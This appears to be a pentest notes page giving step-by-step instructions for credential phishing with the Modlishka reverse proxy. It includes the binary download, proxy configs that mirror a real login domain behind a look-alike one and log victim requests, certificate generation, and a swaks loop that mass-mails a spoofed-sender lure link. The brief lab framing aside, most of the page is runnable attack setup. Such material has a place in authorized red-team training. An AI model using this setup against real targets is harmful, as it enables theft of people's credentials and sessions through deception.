Phishing using Modlishka

Installation

wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64
chmod +x Modlishka-linux-amd64
./Modlishka-linux-amd64 -h

Usage

Modlishka need a conf file for its usage. it also requires certificate and private key for successfull attack.

{
  //This Domain will the one, which will be visited by the victim (Fake Domain)
  "proxyDomain": "programmer-security.com",
  "listeningAddress": "0.0.0.0",

  //This will be the real domain which is legitimate. (Real Domain)
  "target": "programmersecurity.com",
  "targetResources": "",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules":"",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": false,
  "log": "requests.log",  // all logs will be in this file
  "plugins": "all",
  "cert": "",          //your certificate here
  "certKey": "",        // your private key here
  "certPool": ""
}

Attacking in a Lab Environment.

In a lab environment, you can somehow modify the DNS record of the environment to point any random domain, like `test.programmersecurity.com,` to your local IP address. So when a victim visits test.programmersecurity.com, he will be pointing towards your IP.

Now, here we will use modlishka, so that when a user visits test.programmersecurity.com, they should see the contents of programmersecurity.com. So in this case, Modlishka works as a reverse proxy.

When the victim's traffic hits your IP on port 443 (HTTPS) or 80 (HTTP), Modlishka intercepts it. Instead of hosting a fake static HTML page, Modlishka acts as a dynamic bridge:

It establishes a connection to the real backend server (programmersecurity.com).
It pulls the legitimate login pages, assets, and scripts in real-time.
It serves this authentic content back to the victim.

Generating Certificates

We can generate legitimate ssl certificate as well.

openssl genrsa -out test.programmersecurity.com.key 2048
openssl req -new -key test.programmersecurity.com.key -out test.programmersecurity.com.csr -utf8 -batch -subj '/CN=test.programmersecurity.com'

Using awk

The commands below will help you to paste Cert and private key easily in your Modlishka conf file.

awk -v ORS='\\n' '1' test.programmersecurity.com.crt
awk -v ORS='\\n' '1' test.programmersecurity.com.key

Config file

{
  "proxyDomain": "test.programmersecurity.com",
  "listeningAddress": "0.0.0.0",
  "target": "https://login.programmersecurity.com",
  "targetResources": "",
  "targetRules": "",
  "terminateTriggers": "",
  "terminateRedirectUrl": "",
  "trackingCookie": "id",
  "trackingParam": "id",
  "jsRules": "",
  "forceHTTPS": false,
  "forceHTTP": false,
  "dynamicMode": false,
  "debug": true,
  "logPostOnly": false,
  "disableSecurity": true,
  "log": "requests.log",
  "plugins": "all",
  "cert": "-----BEGIN CERTIFICATE-----\n[SINGLE_LINE_CRT]\n-----END CERTIFICATE-----\n",
  "certKey": "-----BEGIN PRIVATE KEY-----\n[SINGLE_LINE_KEY]\n-----END PRIVATE KEY-----\n",
  "certPool": ""
}

Run Modlishka

you can create your own json config file.

./modlishka -config programmersecurity_proxy.json

Send emails using swaks

while read address; do swaks -t $address -from 'robert@programmersecurity.com' -body "hey https://test.programmersecurity.com" -header "Subject: lol" -server 10.10.10.10; done < emails.txt

PreviousMethodology NextHydra

Last updated 29 days ago